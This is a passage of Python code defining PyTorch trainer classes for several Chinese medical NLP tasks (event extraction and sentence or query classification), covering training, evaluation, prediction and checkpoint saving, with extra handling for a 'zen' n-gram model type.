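# task-specific hooks; the subclasses below (e.g. EETrainer, STSTrainer)
# provide the concrete implementations.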
def evaluate(self, model):
raise NotImplementedError
def _save_checkpoint(self, model, step):
raise NotImplementedError
def _save_best_checkpoint(self, best_step):
raise NotImplementedError
def training_step(self, model, item):
raise NotImplementedError
def get_train_dataloader(self):
return DataLoader(
self.train_dataset,
batch_size=self.args.train_batch_size,
shuffle=True
)
def get_eval_dataloader(self):
return DataLoader(
self.eval_dataset,
batch_size=self.args.eval_batch_size,
shuffle=False
)
def get_test_dataloader(self, test_dataset, batch_size=None):
if not batch_size:
batch_size = self.args.eval_batch_size
return DataLoader(
test_dataset,
batch_size=batch_size,
shuffle=False
)
class EETrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(EETrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,
labels=labels, ngram_ids=input_ngram_ids, ngram_positions=ngram_position_matrix,
ngram_attention_mask=ngram_attention_mask, ngram_token_type_ids=ngram_token_type_ids)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
labels=labels, ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
# outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
# active_index = inputs['attention_mask'].view(-1) == 1
active_index = attention_mask.view(-1) == 1
active_labels = labels.view(-1)[active_index]
logits = logits.argmax(dim=-1)
active_logits = logits.view(-1)[active_index]
if preds is None:
preds = active_logits.detach().cpu().numpy()
eval_labels = active_labels.detach().cpu().numpy()
else:
preds = np.append(preds, active_logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, active_labels.detach().cpu().numpy(), axis=0)
p, r, f1, _ = ee_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, model, test_dataset):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
predictions = []
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[3].to(self.args.device)
ngram_attention_mask = item[4].to(self.args.device)
ngram_token_type_ids = item[5].to(self.args.device)
ngram_position_matrix = item[6].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
if args.model_type == 'zen':
logits = outputs.detach()
else:
logits = outputs[0].detach()
# active_index = (inputs['attention_mask'] == 1).cpu()
active_index = attention_mask == 1
preds = logits.argmax(dim=-1).cpu()
for i in range(len(active_index)):
predictions.append(preds[i][active_index[i]].tolist())
pbar(step=step, info="")
# test_inputs = [list(text) for text in test_dataset.texts]
test_inputs = test_dataset.texts
predictions = [pred[1:-1] for pred in predictions]
predicts = self.data_processor.extract_result(predictions, test_inputs)
ee_commit_prediction(dataset=test_dataset, preds=predicts, output_dir=args.result_output_dir)
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class STSTrainer(Trainer):
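    # Sentence-pair classification trainer: batches yield (text1, text2, label). For 'zen'
    # models the inputs (including n-gram features) are built by convert_examples_to_features;
    # otherwise the HuggingFace tokenizer is used directly.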
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(STSTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
        # Call the model through the standard 'transformers'-style keyword interface.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
labels = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = sts_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
sts_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class QICTrainer(Trainer):
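    # Single-sentence classification trainer: batches yield (text, label) and accuracy
    # (qic_metric) is used for model selection.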
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(QICTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
labels = item[1].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
        # Call the model through the standard 'transformers'-style keyword interface.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
labels = item[1].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
acc = qic_metric(preds, eval_labels)
logger.info("%s-%s acc: %s", args.task_name, args.model_name, acc)
return acc
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
qic_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class QQRTrainer(Trainer):
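    # Sentence-pair classification trainer evaluated with accuracy (qqr_metric); otherwise
    # identical in structure to STSTrainer.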
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(QQRTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
        # Call the model through the standard 'transformers'-style keyword interface.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
labels = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
acc = qqr_metric(preds, eval_labels)
logger.info("%s-%s acc: %s", args.task_name, args.model_name, acc)
return acc
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
qqr_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class QTRTrainer(Trainer):
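    # Sentence-pair classification trainer evaluated with accuracy (qtr_metric).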
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(QTRTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
        # Call the model through the standard 'transformers'-style keyword interface.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
labels = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
acc = qtr_metric(preds, eval_labels)
logger.info("%s-%s acc: %s", args.task_name, args.model_name, acc)
return acc
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
qtr_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
